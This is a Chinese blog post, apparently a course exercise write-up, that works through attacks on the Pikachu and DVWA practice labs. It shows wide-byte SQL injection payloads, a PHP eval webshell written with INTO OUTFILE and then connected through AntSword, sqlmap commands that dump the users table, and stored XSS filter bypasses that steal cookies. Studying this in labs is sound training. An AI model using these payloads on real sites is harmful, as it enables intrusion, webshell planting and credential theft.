首页 > 数据库 >08-宽字节注入、GetShell、SQLMap、XSS存储型练习

08-宽字节注入、GetShell、SQLMap、XSS存储型练习

时间:2024-10-25 16:10:33浏览次数:9  
标签:SQLMap XSS GetShell 字节 -- txt sqlmap select 注入

1、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤;

​ 由于网站的过滤,调用其addslashes( ) 函数在单引号之前添加反斜线 \ 进行转义,我们需要让 \ 无效实现单引号的逃逸。

​ 解决方法:因为addslashes( )函数使用时会对输入内容进行URL编码(即添加的 \ 也会编码成%5c)在加上网站本身就设置了GBK编码方式,所以可以利用GBK编码方式(即汉字编码范围内两个字节都会被重新编码为一个汉字)将 \ 转换成汉字实现单引号的逃逸。例:%df%5c 会转换成汉字"運"。

  • 库名(pakachu)

    a.对pikachu靶场的宽字节注入模块进行抓包

    b.将包发送到repeater模块,修改请求正文中是name参数为1%df' union all select 1,database()#来实现对库名的获取(采用联合注入时要注意字段数,这里的字段数为2)

    image-20241025132825771

  • 表名(httpinfo,member,message,users,xssblind)

    1%df' union all select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

    image-20241025133857894

2、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤;

  • 调用select into outfile命令通过sql注入上传带有一句话木马的shell脚本文件

    ' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell666.php
    
    • 上传成功,且能直接使用系统命令查看返回值

    image-20241025140232834

    • 用蚁剑链接

      image-20241025141225084

    • 成功GetShell

      image-20241025141245529

3、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入;

  • 这里会调用 -r 选项(即上传指定文本文件),先通过抓包获取到SQL注入模块的请求数据包,然后将其写入1.txt文本文件中,最后保存到sqlmap目录下。

    image-20241025143143254

    • 获取库python sqlmap.py -r 1.txt --batch --dbs

      image-20241025143712834

    • 获取表python sqlmap.py -r 1.txt --batch -D dvwa --tables

      image-20241025143830198

    • 获取列python sqlmap.py -r 1.txt --batch -D dvwa -T users --column

      image-20241025144250588

    • 获取内容python sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump

      image-20241025144926072

4、完成DVWA靶场存储型XSS的漏洞练习。

  • Low

    image-20241025151935814

  • Medium

    网站采用了对关键字script替换为空的过滤,可以通过大小写绕过

    • 控制台(F12)修改输入框的长度限制

      image-20241025152702575

    • 实现注入

      image-20241025153033597

  • High

    网站采用了对关键字s、c、r、i、p、t、字母进行正则表达式过滤,避免出现以上关键字组合,可以采用img标签中的图片加载失败事件,进行注入(同Medium等级一样,需要先修改输入框长度限制)

    <img src=## one rror=alert(document.cookie)>
    

    image-20241025154404137

标签:SQLMap,XSS,GetShell,字节,--,txt,sqlmap,select,注入
From: https://www.cnblogs.com/bokexiLu/p/18502786

相关文章

  • 漏洞复现Jupyter Notebook未授权访问 getshell
    一、JupyterNotebook介绍JupyterNotebook(此前被称为IPythonnotebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行40多种编程语言。JupyterNotebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示......
  • xssplatform小问题之404页面解决
    不要在小皮里面直接进行伪静态的书写我反复修改然后就是一直反复404出问题方法:1、在这个初始化空白的.htaccess中写入apache的伪静态(在安装说明中有) 粘进去保存。(2)检查一下小皮的apache配置文件中是否开启rewrite刷新页面发现可以访问了二编:如果再次打开发现......
  • 跨站脚本攻击XSS以及Cookie如何实现用户管理
            跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的网络安全漏洞,通常发生在Web应用中。攻击者通过在网页中注入恶意脚本,这些脚本会自动执行,从而达到攻击的目的。XSS攻击可以导致数据泄露、会话劫持、篡改页面内容等多种危害。XSS攻击的类型反射型XSS(Refl......
  • 描述跨站点脚本攻击(XSS)的工作原理,以及如何防御这种攻击(非常详细)
    跨站点脚本攻击(XSS)是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意脚本。这些脚本可以盗取用户数据、劫持用户会话、修改网页内容等。XSS攻击的工作原理是通过在网页中注入恶意脚本,当用户浏览这些网页时,脚本就会被执行。XSS攻击主要分为三类:1.**反射型XSS(Non......
  • C10-08-宽字节注入-mysql注入之getshell-sqlmap
    一宽字节注入利用宽字节注入实现“库名-表名”的注入过程。靶场环境:容器镜像:area39/pikachu宽字节概念1、如果一个字符的大小是一个字节的,称为窄字节;2、如果一个字符的大小是两个及以上字节的,称为宽字节;像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节......
  • Sqlmap命令使用方法总结----适合网络安全小白
    在网上找了很多教程,都是零零散散的,找到了两位位前辈的博客,应该是翻译的官方文档,感谢前辈们做出的贡献.希望能够帮助刚学网络安全的小白们本文参考:漏洞人生和sqlmap用户手册中文版目录Sqlmap使用方法总结sqlmap简介常用语句sqlmap详细命令用法选项目标请求优化注入......
  • XSSLab保姆级教程
    XSS(Cross-SiteScripting)即为跨站脚本攻击。XSS-Lab是一个XSS的练习平台。可以在BUUOJ上很方便的进行练习。以下是我在做XSS-Lab的时候总结的题解和一些思路,给想要刷题的同学提供一些参考。1.通用payload<script>alert(1)</script>可以直接加入新标签level1闭合原有标签后......
  • DAY53WEB 攻防-XSS 跨站&SVG&PDF&Flash&MXSS&UXSS&配合上传&文件添加脚本
    知识点:1、XSS跨站-MXSS&UXSS2、XSS跨站-SVG制作&配合上传3、XSS跨站-PDF制作&配合上传4、XSS跨站-SWF制作&反编译&上传XSS分类:https://www.fooying.com/the-art-of-xss-1-introduction/(失效了)MXSS现在基本上见不到UXSS:UniversalCross-SiteScripting针对浏览器的漏......
  • XSS漏洞利用实验——使用两种方式外带cookie
    0x00前言关于XSS的基本知识可以查看https://blog.csdn.net/weixin_44656518/article/details/142832967?spm=1001.2014.3001.55010x01使用自建服务器外带数据(反射型XSS)使用实验环境:kali虚拟机,pikachu漏洞实验平台1.查看kali虚拟机ip地址我这里是192.168.80.131不同虚......
  • 5.XSS-反射型(post)利用:获取cookie
    原理:文件路径:\pikachu\pkxss\xcookie\post.html将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)基于域名配......